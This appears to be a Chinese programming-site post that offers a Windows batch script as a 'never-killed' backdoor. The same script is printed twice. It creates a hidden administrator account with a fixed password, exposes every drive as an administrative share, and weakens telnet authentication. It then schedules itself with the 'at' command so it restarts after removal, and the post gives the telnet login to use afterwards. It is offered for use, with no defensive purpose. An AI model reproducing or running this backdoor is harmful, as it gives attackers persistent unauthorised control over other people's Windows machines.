批处理bat之永不被杀的后门
程序员文章站
2022-03-22 08:31:01
代码如下: 复制代码 代码如下:@echo off @attrib&...
代码如下:
@echo off
@attrib +s + r xyt.bat
@net user xyt hacker /add
@net localgroup administrators xyt /add
@net share c$=c:
@net share d$=d:
@net share e$=e:
@net share f$=f:
@net share g$=g:
@net share h$=h:
@tlntadmn config sec = -ntlm
@net stop schedule
@net start schedule
@echo at 11:00 c:\winnt\system32\log.bat > c:\winnt\system32\xyt.bat
@echo at 23:00 c:\winnt\system32\log.bat >> c:\winnt\system32\xyt.bat
@at 11:05 c:\winnt\system32\xyt.bat
@at 23:05 c:\winnt\system32\xyt.bat
@net stop telnet
@net start telnet
@exit
这样就会循环运行我们的程序了,即使被人停下来,过几个小时,又回重新运行,呵呵~~
运行后telnet ip上去,用户名为xyt,密码为hacker。
复制代码 代码如下:
@echo off
@attrib +s + r xyt.bat
@net user xyt hacker /add
@net localgroup administrators xyt /add
@net share c$=c:
@net share d$=d:
@net share e$=e:
@net share f$=f:
@net share g$=g:
@net share h$=h:
@tlntadmn config sec = -ntlm
@net stop schedule
@net start schedule
@echo at 11:00 c:\winnt\system32\log.bat > c:\winnt\system32\xyt.bat
@echo at 23:00 c:\winnt\system32\log.bat >> c:\winnt\system32\xyt.bat
@at 11:05 c:\winnt\system32\xyt.bat
@at 23:05 c:\winnt\system32\xyt.bat
@net stop telnet
@net start telnet
@exit
这样就会循环运行我们的程序了,即使被人停下来,过几个小时,又回重新运行,呵呵~~
运行后telnet ip上去,用户名为xyt,密码为hacker。
上一篇: 不错的几个bat实例
下一篇: 迅速删除非法文件名的批处理代码